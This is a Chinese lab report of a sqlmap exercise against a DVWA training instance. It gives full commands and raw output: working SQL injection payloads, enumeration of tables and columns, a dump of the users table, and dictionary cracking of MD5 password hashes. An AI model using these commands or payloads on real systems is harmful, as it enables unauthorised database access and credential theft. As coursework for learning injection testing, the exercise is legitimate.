web渗透测试实战-SQLMAP

一、实验项目名称

web渗透测试实战-SQLMAP

二、实验目的及要求

熟悉SQL注入漏洞原理

熟悉SQLMAP工具使用。

1、获取数据库信息：数据库漏洞、数据库名、数据库版本等

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db

 

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

2、获取数据库表名

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

3、获取数据库指定表的字段

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/

4、获取用户名和密码（字段直接逗号隔开）

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '
[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['
[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
